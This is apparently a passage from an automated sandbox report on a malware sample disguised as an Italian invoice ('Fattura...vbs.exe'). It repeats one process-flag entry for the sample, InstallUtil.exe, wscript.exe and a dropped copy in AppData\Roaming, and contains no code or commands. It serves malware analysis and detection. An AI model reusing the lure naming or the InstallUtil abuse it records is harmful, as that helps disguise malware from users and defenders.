Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
